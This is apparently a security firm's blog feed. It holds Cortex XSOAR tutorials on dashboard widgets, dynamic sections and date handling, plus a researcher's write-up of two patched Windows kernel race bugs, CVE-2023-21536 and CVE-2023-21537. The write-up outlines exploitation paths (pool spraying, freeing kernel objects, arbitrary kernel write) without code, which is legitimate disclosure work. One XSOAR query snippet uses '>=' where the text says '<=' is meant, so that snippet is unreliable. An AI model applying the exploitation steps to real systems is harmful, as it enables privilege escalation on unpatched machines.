	"prevSum": total_last_month_counts,
	"currSum": total_this_month_counts
}

The resulting widget looks as follows:

Figure 6: War room view of the widget outputted by the “Dual values from Sentinel” code snippet

Moving to incidents and indicators

Until now, we have been displaying our widgets in the war room, however we can also add them to incident and indicator layouts as well. As a reminder, the procedure to add General Purpose Dynamic sections to an incident can be found here: Add a Script to the incident Layout.

Our existing widgets are already compatible with incidents and indicators, after following the instructions above on how to add widgets to incidents, we can get the following layout tab. In a similar fashion after adding the dynamic-indicator-section tag to all three automations, you can also add them as widgets to an indicator layout:

Figure 7: Incident VS Indicator view of the three widgets

Moving to a dashboard

Rendering widgets in a dashboard is actually easier than in an incident layout, to verify this, let’s compare the methods to output a simple number widget, both for an incident and for a dashboard. For an incident, as we already saw earlier, you need to return the actual number, but it needs to be wrapped appropriately:

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
        "stats": 53,
        "params": {
            "layout": "horizontal",
            "name": "Lala",
            "sign": "@",
            "colors": {
                "items": {
                    "#00CD33": {
                        "value": 10
                    },
                    "#FAC100": {
                        "value": 20
                    },
                    "green": {
                        "value": 40
                    }
                }
            },
            "type": "above"
        }
    }
}

demisto.results(data)

In contrast, it is much easier for a dashboard:

result = 10
demisto.results(result)

The difference here is that when building a dashboard, you can access the widget builder:

Figure 8: Dashboard widget editor view

Whereas from an incident, you need to explicitly return metadata defining the look and feel of your widget.

Therefore, if we want to make it possible for our automations to be used from a dashboard too, we need to adapt them to return either a simple value if being called from a dashboard, or a wrapped value if called from an incident or indicator.

Our first addition to the existing scripts will be to identify whether we’re being called from a dashboard, we will use the following snippet for this purpose.

is_dashboard = demisto.args().get("widgetType") is not None

This works because dashboards that have automation based widgets add a special argument when calling these automations. This special argument mentions the expected results type and can be found under the key widgetType, it’s presence is a good indication that your automation has been called from a dashboard.

We can now differentiate our outputted results depending on whether or not we are in a dashboard. For that, we separate our incident/indicator results in two, between the actual data and the wrapper. This snippet exposes the statement above applied to our first automation:

number = 53

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
      "stats": number,
......
if is_dashboard:
    demisto.results(number)
else:
    demisto.results(data)

We do this with our three automations and also add the widget tag to them to make them selectable as source for automation-based dashboard widgets. Once added to a dashboard, our widgets look as follows:

Figure 9: Dashboard view of the three widgets

Getting timeframe data from the dashboard

At this point we are powering our widgets with data from Sentinel, but we are always looking at data from the same timeframe. Because dashboards have a time picker, we can instead start to use that data to determine the timeframe we are querying Sentinel for. Extraction of timeframe data from dashboards was covered in this previous blogpost.

We start by adding this line to our automation:

FromDate, ToDate = (
    NitroDateFactory
    .from_regular_xsoar_date_range_args(
        demisto.args()
    )
)

This gives us two NitroDates we can use to craft our Sentinel queries. In our second script which queries a single timeframe, the code becomes:

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{from_}")')

if to_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{to_}")')

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| summarize count() by same"""

The logic we are modifying is the one describing how we craft our Kusto query (the query langage used in Microsoft Sentinel). We previously always had at our disposal a from_ and a to_ string representing the beginning and end of the timeframe we were interested in. With the selection dashboard date range selector, this is not the case anymore, we may get only a start date if the selector is on “3 days ago to now”, or only an end date if the selector is on “up to 3 days ago”. We must then change the logic we use to craft our query in a way that reflects this change. To accomodate this, we replace the between statement with >= and <= statements used to compare the TimeGenerated of an incident to the dates transmitted by the dashboard.

In a similar fashion, we modify the 3rd automation to calculate both the initial timeframe, and the previous timeframe from the dates passed down by the dashboard.

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

from_2 = "2022-09-01T00:00:00+00:00"
to_2 = "2022-10-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        if isinstance(ToDate, NitroRegularDate):
            td = ToDate.date
        else:
            td = datetime.now(timezone.utc)
        delta = td - FromDate.date
        from2 = NitroRegularDate(date=FromDate.date - delta)
        to2 = FromDate
    else:
        from2 = FromDate
        to2 = ToDate

    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None
    if isinstance(from2, NitroRegularDate):
        from_2 = from2.to_iso8601()
    else:
        from_2 = None
    if isinstance(to2, NitroRegularDate):
        to_2 = to2.to_iso8601()
    else:
        to_2 = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f"TimeGenerated >= datetime(\"{from_}\")")

if to_ is not None:
    tmp_query_list.append(f"TimeGenerated < datetime(\"{to_}\")")

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| union (
SecurityIncident"""

tmp_query_list2 = list()

if from_2 is not None:
    tmp_query_list2.append(f"TimeGenerated >= datetime(\"{from_2}\")")

if to_2 is not None:
    tmp_query_list2.append(f"TimeGenerated < datetime(\"{to_2}\")")

if tmp_query_list2:
    query += "\n| where " + " and ".join(tmp_query_list2)

query += """
| extend same = 2)
| summarize count() by same"""

Our dashboard is now fully dynamic, with two widgets presenting data corresponding to the selected timeframe:

Figure 10: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Today”
Figure 11: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Last 7 days”

Looking back

We have covered the use of number widgets throughout Cortex XSOAR in pretty much every scenario, and have managed to make use of all the inputs available to us. Although the process used in this post was centered around number widgets, it should be noted that it can be applied to all other types of widgets.

References

Cortex XSOAR documentation: script based widget examples

Cortex XSOAR documentation: script based widget example 2

Microsoft Azure: Sentinel

Cortex XSOAR marketplace: Azure Log Analytics Integration

Cortex XSOAR documentation: Python code conventions

GIthub: Cortex XSOAR source – EntryTypes

Cortex XSOAR documentation: adding a script to an incident layout

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – text

10 February 2023 at 09:00
Cortex XSOAR Tips Tricks – Leveraging dynamic

Introduction

Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC (Security Operation Center) is data availability. As a SOC Analyst, doing a thorough analysis of a security incident requires having access to many pieces of information in order to acquire context on the events you are investigating. In a less mature SOC, this information is at best scattered in many tools, and at worst hardly available. This can be overcome by using multiple data sources to ingest contextual information into your Security Automation and Automated Response platform (SOAR). In turn, this allows you to provide a single pane of glass to the analysts which can then focus on meaningful work, and eliminate data collection from their daily tasks.

Objectives

In this blogpost, we will focus on the use of dynamic sections to customize layouts in Cortex XSOAR. We will show that they can be used to display raw incident data for debugging purposes without cluttering the main workplace of our analysts.

A dynamic section is a layout element which you can add to a layout tab for either an incident or an indicator.
The fundamental difference between it and most other available layout elements is that it is not bound to displaying incident fields or fields of indicators related to the current incident on display, but instead is purely automation based.
This means that upon being rendered, a dynamic section executes an automation, and it is both the specific format and output of that automation that dictates the style and content that will be rendered.

This is not unlike the behavior of field display scripts, but these will be covered in a later post.

Real World Example

As part of our operations as an MSSP (Managed Security Services Provider), we are often faced with alert ingestion issues or mishaps.

One way these occur is that an alert will be fetched into Cortex XSOAR but some of it’s important features will not have been picked up by our extraction logic. This could materialize as missing fields in indicators or missing indicators all together. We may for example have received an alert for suspicious actions taken by a user, yet that very user was not added to the incident as an indicator, nor were details about these actions.

Incident Info tab of a Cortex XSOAR incident – the name of the incident points to unsanctioned cloud app usage by a user, but neither information about the user nor about the unsanctioned app was extracted.

This could happen in many different ways, most commonly that the exact data scheme used by the tool that generated the alert has changed. When this happens, the information we want to extract is present in the alert we fetch, it’s just not located where we’re used to find it. In such cases, a manual inspection of the raw data that came in is sufficient to identify where the data we want can be found. However, as shown in the next screenshot, manually inspecting the raw data of an incident is not that user friendly in Cortex XSOAR.

View of the “Context Data” of an Cortex XSOAR incident – the presentation of the available data is unsuitable for manual inspection

To make it easier, we built our own dynamic section, which displays curated data from both the labels and some entries of an incident. The result is as follows:


In this example, Azure Active Directory identifiers are available and can be leveraged to get the details of the involved user. In a similar manner, the Cloud Application Id is available.

Our dynamic section is powered by an automation that enumerates the labels of the current incident.

ret_labels = {}
incident = demisto.incident()
if not (isinstance(incident, dict) and "labels" in incident.keys()):
	continue
labels = incident["labels"]
if not isinstance(labels, (list, List)):
	continue
for label in labels:

Similarly, it also enumerates specifically tagged war room entries.

ret_notes = {}
investigation_id = demisto.incident()["id"]
uri = f"investigation/{investigation_id}"
body = {
	"pageSize": 100,
	"categories": [],
	"tags": ["raw_data"],
	"notCategories": [],
	"usersAndOperator": False,
	"tagsAndOperator": False,
}
body = json.dumps(body, indent=4)
args = {"uri": uri, "body": body}
res_cmd = demisto.executeCommand("demisto-api-post", args)
for res in res_cmd:
	if not (isinstance(res, dict) and isinstance(contents := res.get("Contents"), dict)):
		continue
	if not isinstance(response := contents.get("response"), dict):
		continue
	if not isinstance(entries := response.get("entries"), (list, List)):
		continue
	for entry in entries:

Once the incident labels are fetched, we extract their contents:

for label in labels:
	if not isinstance(label, dict):
		continue
	label_type, label_value = label.get("type"), label.get("value")
	if not (isinstance(label_type, str) and isinstance(label_value, str)):
		continue
	try:
		label_value = json.loads(label_value)
	except Exception:
		pass
	try:
		ret_labels.update({label_type: label_value})
	except Exception:
		pass

In a similar fashion, for each returned War Room entry, we extract the name of the parent playbook task and the content of the entry:

for entry in entries:
	key = ""
	if not isinstance(entry, dict):
		continue
	if isinstance(entry_id := entry.get("id"), str):
		key += entry_id
	if isinstance(entry_task := entry.get("entryTask"), dict):
		if isinstance(task_name := entry_task.get("taskName"), str):
			key += " - " + task_name
	value = None
	if isinstance(cnt := entry.get("contents"), str):
		try:
			value = json.loads(cnt)
		except Exception:
			value = cnt
	ret_notes.update({key: value})

To tie it all up, and because our goal is to offer a tree like navigable output, we structure our outputted data into a dictionary.

ret = {
	"notes": ret_notes,
	"labels": ret_labels
}

At that point, we cannot just output this dictionary as is, we need to encapsulate it in a way that will indicate to the layout that we want this layout element to be shown as a JSON tree.

results = CommandResults(raw_response = ret)
return_results(results)

By now, our code is good to go and all we need to do is to edit our incident layout to add a new tab and create a new dynamic section powered by the automation we just built.

In Cortex XSOAR, navigate to Settings, Objects setup, Layouts, and either modify an existing layout or create your own. From there you can add a new General Purpose Dynamic Section.

Once your General Purpose Dynamic Section is added to your layout tab, you can edit it and choose the automation it executes. If your automation does not show up in the list of available ones, make sure you added the “dynamic-section” tag to it.

In this blog post, we have shown you how to display complex data in an incident layout which can be used by a security analyst to provide more context. In future posts, we will present more detailed context additions that tie in nicely with the Cortex XSOAR user interface.

References

Palo Alto Cortex XSOAR documentation: how to add a custom widget to the incident and indicator pages

Microsoft Sentinel Cloud Application Entity Identifiers

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

Racing bugs in Windows kernel

12 January 2023 at 14:05

Agenda

  • ETW for security researcher

  • CVE-2023-21536 overview

  • Why other Filters are not vulnerable

  • Exploitation

  • CVE-2023-21537 overview

  • Exploitation

  • Conclusion

TL;DR
In this writeup, I share my research methodology and exploitation info about 2 kernel bugs I reported to MSRC and fixed January 2023. The first bug is a race condition that causes Use-After-Free on ETW filter, and the second bug is a double fetch race that causes "free" of controlled pointers in Windows messaging queue module.

ETW for security researcher overview
This first bug I reported exists in Windows since 2018 and is specifically related to the ETW module. ETW has quite wide functionality in the kernel and I will make some high level overview from a security researcher's perspective.

ETW stands for Event Tracing for Windows- and as its name suggests it collects a lot of logs and events during the kernel execution. The design is a Providers that can generate event logs and Consumers that listen to events emitted by Providers. These logs can be inspected by system admin for the purpose of technical OS problems or security-related issues. You can read more about ETW design here (1) and here (2).

ETW has 3 main kernel entry points which can be reached from userspace
NtTraceEvent
NtTraceControl
NtSetSystemInformation

NtTraceControl - takes 5 arguments: the information class(function num), Input buffer + length, Output buffer + length. There are about 40 different functions that can be triggered and most of them are dealing with providers/consumers configurations such as:
-Start/stop tracing
-Register/Enable providers
-Configuring providers notifications
-Get trace/log info

Pretty much attack surface. The important point here is that some operations are restricted to specific users. This is checked via several functions (EtwpCheckLoggerControlAccess, EtwpAccessCheck,EtwpCheckGuidAccess) where basically when you want to interact with ETW provider/log these "check" functions have hardcoded access check permissions that are needed for certain functionality. For example, if you want to start a trace session, EtwpAccessCheck will be called with the required access of 0xA0 which means that the calling user must be in a group that holds the TRACELOG_CREATE_REALTIME + TRACELOG_GUID_ENABLE privileges. A good overview of ETW and permission groups can be found here (3).

A lot of applications already hold open handles to providers they have registered with. This means that once you have code execution in such application so you will be able to trigger a lot of NtTraceControl functionality. For example, Notepad.exe holds handles of type EtwReg with access permission of 0x804, this will allow you to interact with many ETW kernel functions.

NtTraceEvent takes 4 arguments: handle to Provider, Flags, Input Buff length + Input Buff. It has about 10 functions that can be triggered from userspace and most of them make the actual event writing to logs. Here the same applies to access checks, for who can write events to where.

NtSetSystemInformation - takes 3 arguments: the class should be SystemPerformanceTraceInformation, Input Buff + Length. This API has about 30 functions that can be called from user space. Some of the functions are related to trace performance, restart info, profiles info and more.

CVE-2023-21536 overview
This bug was found by manual review and I doubt it can be found by a fuzzer because the race condition has quite a small window. The bug is in the main ntos kernel binary.
My approach to this research was to try understand what shared entities are encapsulated in the ETW module. When I say shared I mean which interesting structures exist in ETW which probably might be accessed from different functions. This is quite easy because ETW has several critical structures that for sure must be accessed from different places. For example:
WMI_LOGGER_CONTEXT, ETW_REALTIME_CONSUMER, ETW_GUID_ENTRY, ETW_REG_ENTRY, ETW_QUEUE_ENTRY

You can see these structs descriptions with most fields reversed engineered at https://www.vergiliusproject.com/kernels/x64/Windows%2011.
Now let's say that you identified some interesting structure/object and you see that one of its members is a pointer to some allocated data/object. Now the question is how is this pointer get managed? who allocates it? Who frees it? Is there any remove/replace logic for this pointed data? The basic question here is whether there is a possibility that two independent functions take this pointed data and operate on it simultaneously.
In most cases, the programmer of the code will need to use locks when touching such a pointer. Some locks can be for read access and some for write access. Usually "read locks" can be taken without being released first.
A crucial point here is at what exact places this lock is taken and whether it is actually taken and not forgotten. When I say exact places I mean is the lock taken early enough before any critical shared data is accessed? and not less critical is whether the lock is held and not released earlier than needed.
For my purpose, I started looking at the ETW_GUID_ENTRY. You can see at offset 0x180 there is a member called FilterData. This is a pointer to a struct of type ETW_FILTER_HEADER.

struct _ETW_FILTER_HEADER{    LONG FilterFlags;                                                           struct _ETW_FILTER_PID* PidFilter;                                          struct _ETW_FILTER_STRING_TOKEN* ExeFilter;                                 struct _ETW_FILTER_STRING_TOKEN* PkgIdFilter;                               struct _ETW_FILTER_STRING_TOKEN* PkgAppIdFilter;                            struct _ETW_FILTER_STRING_TOKEN* ContainerFilter;                           struct _ETW_PERFECT_HASH_FUNCTION* StackWalkIdFilter;                       struct _ETW_FILTER_EVENT_NAME_DATA* StackWalkNameFilter;                    struct _EVENT_FILTER_LEVEL_KW* StackWalkLevelKwFilter;                      struct _ETW_PERFECT_HASH_FUNCTION* EventIdFilter;                           struct _ETW_PAYLOAD_FILTER* PayloadFilter;                                  struct _EVENT_FILTER_HEADER* ProviderSideFilter;                            struct _ETW_FILTER_EVENT_NAME_DATA* EventNameFilter;                    };

These filters are used to filter events that a provider is going to write to a trace session. A lot of pointers and they should be managed somehow, the fastest way to get an overview where this FilterData is used is by searching in IDA for offset 0x180. Any function that interacts with FilterData will need at some point to dereference the ETW_GUID_ENTRY at offset 0x180 in order to get the FilterData pointer.
The basic assembly instruction will look like this: mov rcx, [rdi+180h]
In IDA, go to Search -> Immediate Value -> Value to search=0x180
You will get many (600) results most of them false positive, but if you search in the results for functions containing "etw" you will narrow the results to 75. From here you can see that some results make compare or some irrelevant operations so you narrow to the final 60 results.
*pay attention that when narrowing the search to "etw" you may miss some results.

Here are the results:

Now after reversing some logic around these filters you will see that you can set/update filters to a provider via the NtTraceControl api. The inner function that is responsible for it is -EtwpUpdateFilterData(ETWGUID_ENTRY a1_Guid, unsigned int a2_LogerIndex, ETWENABLE_NOTIFICATION_PACKET a3_pEnablePacket, int64 a4_isRemove, ETWFILTER_INFO *a5_outFilterInfo)

The 3rd arg is controlled and sent from userspace and its structure is:

struct ETW_ENABLE_NOTIFICATION_PACKET{ETWP_NOTIFICATION_HEADER DataBlockHeader;TRACE_ENABLE_INFO EnableInfo;TRACE_ENABLE_CONTEXT LegacyEnableContext;unsigned int LegacyProviderEnabled;unsigned int FilterCount;EVENT_FILTER_DESCRIPTOR Filters[0 to FilterCount];};

When reversing the EtwpUpdateFilterData() function you can easily see that if you pass FilterCount=0 then the current filters will be freed. Additional option is to update a filter but it is not interesting. There is a total of 12 filters you can free so the critical question now is whether this flow is protected by a "lock". Why? because if this current flow can free a filter and no locks are taken so you can cause a Use-After-Free by racing another flow which "uses" this filter. So you basically get one flow freeing a filter and another flow using this filter.

The most appropriate "lock" to be used is the etw_guid_entry lock because all these filters belong to guid_entry. The calling function is EtwpUpdateGuidEnableInfo, a quick search comes with no lock here. Let's look at the upper calling function - EtwpEnableGuid, there is a lock via ExAcquirePushLockExclusiveEx(&guidEntry->Lock, 0). The lock is exclusive so no other flows can take the same lock. Looks like the code of the "freeing" side is safe.

All this is good unless you forget to lock the "filter use" flow. Locks must be on both the free and the use sides. Here comes some challenging reversing, I want to find all the places where these filters are used and verify that locks are taken appropriately. Once again you can use the search results on offset 0x180 to see which functions use filters. Seems like there are dedicated functions to use filters - EtwpApplyEventNameFilter(), EtwpApplyEventIdPayloadFilter(), EtwpApplyPackageIdFilter(), EtwpApplyContainerFilter(), EtwpApplyExeFilter, EtwpApplyLevelKwFilter(), EtwpApplyScopeFilters() and several more.

Now you need to reverse these functions and see if proper locking is done. Four filters caught my eye - EtwpApplyEventIdPayloadFilter, EtwpApplyEventNameFilter, EtwpApplyStackWalkIdFilter, EtwpApplyLevelKwFilter. The last one is the vulnerable filter which causes use-after-free.
EtwpApplyLevelKwFilter is called from two funcs - EtwpWriteUserEvent and EtwpEventWriteFull. EtwpWriteUserEvent can be easily triggered from user space by calling the NtTraceEvent api. At this flow no locks are taken at all, meaning that when you try to apply a filter you are actually in a race with the flow that can "free" the filter. The filter-apply side is unsafe while the filter-free side is safe.
You may also notice that NtTraceEvent can be called with Flags value=0x300 and thus getting a handle with access permission of 0x800. This permission is widely used and many processes have already open handles like it so you can trigger the EtwpApplyLevelKwFilter from many processes once you can execute your code at such a process.
The Race condition:

Why other filters are not vulnerable
As mentioned before, another three filters take exactly the same "no lock" flow via NtTraceEvent() api: EtwpApplyEventIdPayloadFilter(), EtwpApplyEventNameFilter(), EtwpApplyStackWalkIdFilter().
So how is it that they cannot be raced and do not cause use-after-free?
It seems like synchronization is done in not standard way via IRQL levels. When the CPU's IRQL is increased to high level it ensures that only the current CPU flow is running. This trick can be used for a very short period of time and is usually used when interrupts occur or very important task need to be done. If you look at the implementation of these 3 filters you can see that they all use writeCR8(2) just before applying logic on the filter and writeCR8(0) once finished. This will increase IRQL to DPC(2) level while "using" the filter.
On the freeing side at EtwpUpdateFilterData you may notice that before these 3 filters are freed there is a call to KeGenericCallDpc(KeAbCrossThreadDeleteNopDpcRoutine, 0). This will try to raise all CPUs IRQL to DPC(2) level and thus will fail if a filter is being used. So finally we are left with only 1 filter - KwFilter, which is freed without any IRQL tricks and also being used without a lock and without IRQL tricks.

Exploitation ideas and challenges
For the purpose to allow Windows users to update their systems, only general steps are discussed.
In order to win the race you will need to race two threads that constantly trigger the two flows - filter use + filter free. The good news is that if you lose the race you can just keep trying till you succeed and nothing will crash.

The KWFilter is allocated from PagedPool with a size 0x18. You will need to make very fast spray to be able to allocate on this exact spot. Alternatively, it might be possible to make the race window wider so the flter is used for longer time so you can cause a use-after-free.
KWFilter allocation will be with many other allocated objects ranging the size of 0x10-0x20 which means a pretty noisy bucket. You will probably need to make sure that some random allocations do not interfere with your spraying.
Spraying controlled data with WNF objects might be a good try. You can read more on WNF for exploitation here (4).

CVE-2023-21537 overview
This bug was found by manual code review and it exists in the mqac driver for more than 10 years. The bug is a double fetch race when kernel logic reads the same user-space address at different points. Message Queuing (mqac) driver enables applications running at different times to communicate across networks and systems that may be temporarily offline.
The easiest way to trigger functionality at this driver is via MQAC api which has user-mode functions such as MQOpenQueue, MQReceiveMessage, MQSetQueueProperties and more. An additional way is to directly send IOCTL commands from user-space and these commands will be parsed in mqac driver's ACDeviceControl() function.
While reversing the different IOCTLs I saw that ioctl 0x19658107 is accessible for any users and it calls to ACSendMessage(DeviceObject, Irp, InBuffLen, FileObj->FsContext, InBuff). The last argument is a big user space buffer with a size of 0x2C0.

The ACSendMessage() flow starts well when the user space buffer is get copied to local kernel buffer and then ACDeepProbeSendParams(DeviceObject, InBuffCpy, oCtxPtrs) is called to validate that the copied user buffer contains valid pointers that do not point or intersect kernel space. The user buffer is pretty complex combination of structures and some of these structures must be validated to have valid pointers.
One such structure at offset 0x250 is validated via the ACDeepCopyQueueFormat( ArrayOfElements, ElementsCount, outDeepCopyArray). This structure is an Array of elements and each element size is 0x20. All these elements are copied to kernel space and as these elements contain pointer to a user-supplied String so this String needs to be validated and copied to a new kernel space allocated memory making a "deep copy". Also, elements count is validated not to go out of buffer when making the deep copy. The resulting "deep copy" buffer is returned via the 3rd argument outDeepCopyArray and saved locally on stack.

After this CQueue::PutNewPacket() is called to send the user-requested data and after it finishes a call to ACFreeDeepCopyQueueFormat(outDeepCopyArray, ElementsCount) is made.

Here is the bug - the 2nd argument is taken directly from the User Space input buffer from offset 0x248. The ElementsCount is now used as a counter to iterate over the deep copy buffer and make a clean-up logic. Because the ElementsCount is fetched from user space you totally control it and a pretty wide race occurs between the allocation flow(good) and the free flow(bad). Exploiting the race and changing the ElementsCount to big value will cause out of bound free of random pointers. The ACFreeDeepCopyQueueFormat() checks the type of the element and if it is 3, 6 or 8 then it frees the pointer that is in the +0x8 offset, the next subsequent QWord. This free logic 'expects' there to be a pointer to a previously allocated string that needs to be freed.

Exploitation ideas and challenges
For the purpose to allow Windows users to update their systems, only general steps are discussed.
The bug allows you to free pointers that exist after the "deep copy" array of elements. The out of bound elements are considered as 0x20 size. The only precondition is that the value at offset 0x0 (fake element) is 3, 6 or 8.
The main idea is to cause an implicit use-after-free by freeing some known object.

Three main tasks:
1. How to get controlled data exactly after the "deep copy" buffer.
2. What pointer/object to free.
3. What should I do with the freed object.

Task 1:
The "deep copy" buffer is allocated on Paged Pool which means the controlled fake elements will need to be allocated also on paged pool. The good news here is that the "deep copy" buffer is a multiple of 0x20 that means you pretty control the bucket where the original allocation will be. For example, if you specify at offset 0x248 that the array has 8 elements so a total buffer of 0x20*8=0x100 will be allocated at the kernel paged pool. This is a big advantage as if your fake controlled objects are exactly 0x100 size it will still be good with your exploit.

For the purpose of spraying controlled data you can use WNF objects which have full control of the data except for the first 0x10 bytes. The challenge here is how to place the fake data exactlly after the "deep copy" buffer - windows kernel heap allocator for this allocation sizes has full randomization when allocating 0x100 chunks so techniques such as making holes for allocations will fail. You can read Saar Amar overview of LFH here (5).

Task 2:
Here you want to choose an interesting object to be freed and thus causing use-after-free. Such an object could be I/O ring or ALPC reserved blob. Both these objects have capability to construct an arbitrary write primitive if you can free it and allocate your controlled data. At this stage it doesn't matter if the object to be freed is on Paged pool or not because you can free any pointer by design via the mqac bug.
The challenge here is how to know the address of the object to be force freed?. If you run on a Medium integrity process it is an easy task but if you are a Low integrity user you will need to construct a read primitive to leak the address of the object to be freed. For this purpose, you might consider first freeing a pipe attribute object which will help you construct a read primitive and leak the address of IO ring/ ALPC blob object that you want to free.

Task 3:
Once you free I/O ring object you can use Yarden Shafir's arbitrary kernel write technique from (6).
IO Ring allows user mode code to queue many IO operations and submit them in one shot. IO Ring is also capable of using a preregistered buffers as an input for IO Ring operations. At offset 0xB8 there is a IOP_MC_BUFFER_ENTRY* RegBuffers which is used to point to an array of preregistered buffers. Once you free IO Ring and instead allocate your controlled data you can make this RegBuffers point to your userspace array of controlled data. Why is it useful? because IO Ring logic will dereference this array for determining where to read or write the next IO operation. The logic will take the WhereToWrite value and use it as a destination for writing.

Conclusion
The first vulnerability is a Use-After-Free caused by a tight race condition when on one hand the Filter is freed and on the other hand it is used. The freeing flow uses an exclusive lock but the other flows using this filter make poor job on locking the Filter. It seems like when adding this specific filter to the code the programmer misunderstood how it should be done correctly and that is quite understandable because the other filters use strange synchronization.
The second vulnerability is a double fetch race that gives you the ability to free arbitrary objects. The code relies on that the user space input buffer remains without any changes during the execution of the function. This bug is very powerful and might be exploited in different ways.
At the first bug, I shared my approach to the research and how I managed to identify the different flows that need to be researched. Hope it will help other researchers to research and publish their write-ups about windows kernel bugs.
For questions and comments about the writeup you can reach me at [email protected]

(1) https://windows-internals.com/exploiting-a-simple-vulnerability-in-35-easy-steps-or-less/
(2) https://nasbench.medium.com/a-primer-on-event-tracing-for-windows-etw-997725c082bf
(3) https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/etw/secure/index.htm?ta=11 HYPERLINK "https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/etw/secure/index.htm?ta=11&tx=25,26,29,30,32,35,36,196;24,194"& HYPERLINK "https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/etw/secure/index.htm?ta=11&tx=25,26,29,30,32,35,36,196;24,194"tx=25,26,29,30,32,35,36,196;24,194
(4) https://research.nccgroup.com/2021/07/15/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/
(5) https://github.com/saaramar/Deterministic_LFH
(6) https://windows-internals.com/one-i-o-ring-to-rule-them-all-a-full-read-write-exploit-primitive-on-windows-11/

Cortex XSOAR Tips & Tricks – Dealing with dates

25 January 2023 at 09:00
Cortex XSOAR Tricks Dealing with dates

Introduction

As an automation platform, Cortex XSOAR fetches data that represents events set at defined moments in time. That metadata is stored within Incidents, will be queried from various systems, and may undergo conversions as it is moves from machines to humans. With its various integrations, Cortex XSOAR ingests datetimes from sources that use different standards, yet manages to keep track of all of them.

Objectives

In this blog post, we will go over dates in Cortex XSOAR, showing where they are presented and used, as well as how they are stored and passed around.
We will present a real world use case for extracting the dates being passed to the elements of a dashboard. With that in mind, we will go deeper onto the technicalities of passing timeframes to widgets and present an object oriented approach to interpreting and converting those, ensuring that this becomes an easy process, even when using third party tools.
The codebase for this post is available on the NVISO Github Repository.

Dates in XSOAR

Let’s look at the use of dates in Cortex XSOAR throughout the GUI and let’s pay attention to the formats we encounter:
Within incident layout tabs, incident fields of type “date” are formatted in a human readable way.

Occurence, Creation, and Last update dates in the Timeline Information GUI widget of an XSOAR Incident.

However in the raw context of an Incident, we see the same dates but stored in the ISO 8601 format:

Multiple datetime fields in the Context GUI of an XSOAR Incident

The dates we can observe in the raw context are formatted to be machine readable, this is what Integrations, Automations, and Playbooks read.

The dates visible in the layout tab are rendered live from those in the context. Cortex XSOAR adapts this view depending on the preferred timezone of the current user, which is saved in it’s user profile. This explains the 1 hour difference between the raw dates and their human readable counterparts in our examples above.

Moving on to the dashboards page, we get a time picker to selectively view Incident and Indicator data restricted to a given period of time. In the next part, we will find out how this time frame is passed down to the underlying code generating the tables and graphs that make up the dashboard. For that purpose, we will build a new dashboard comprised of a single automation based Widget.

Date Range Selector of a XSOAR Dashboard, set to display information from the “Last 7 Days”

The dashboard date picker

We just saw that Dashboards introduce a date picker element, it lets you select both relative timeframes such as “Last 7 days” and explicit timeframes where you define two precise dates in time. To find out how this is effectively passed down, we will use an automation based widget and dump the parameters provided to this automation.

If you need help on creating an automation, please refer to the XSOAR documentation on automations.

Let’s create an automation with the following code, not forgetting to add a ‘widget‘ tag to it.

import json
demisto.results(json.dumps(demisto.args()))

The snippet above will print the arguments passed down to the automation.

To run our automation and get it’s output, we need to create a new dashboard and add a text element to it, it’s content will be populated by our automation. For help on creating a dashboard and automation based widgets, please refer to XSOAR – add a widget to a dashboard and XSOAR – creating a widget automation.

We start our reversing effort by using the dashboard with an explicit timeframe:

Dashboard outpout with the date range “19 Apr 2022 – 22 Apr 2022”

At first glance, we identify the two arguments that interest us, “to” and “from”, each containing an ISO 8601 string corresponding respectively to the lower and higher bounds of our selected timeframe.

When we use relative dates, we get still get ISO 8601 strings, However, the “to” argument now holds a default value pointing to January first of year 1.

Dashboard outpout with the date range “Last 6 months”

Finally, when we use the ‘All dates’ date picker, we get two of these arbitrary strings.

Dashboard outpout with the date range “All times”

The findings above can be understood as being a standard on passing dates and time frames, and we can assume that all builtin Cortex XSOAR content can handle it. However, this may not be the case for third party tools. To interface with the latter, and to create our own dashboard compatible content, we need a way to interpret these dashboard parameters.

Objectives redefinition

We have now identified how the dates that define the beginning and the end of a daterange are passed to the elements of a dashboard, after a user selects that date range in the web interface. This opens new capabilities, as we are now not bound anymore to dashboard elements builtin to Cortex XSOAR, but can start to imagine querying period relevant data in third party systems to visualize in our dashboard.

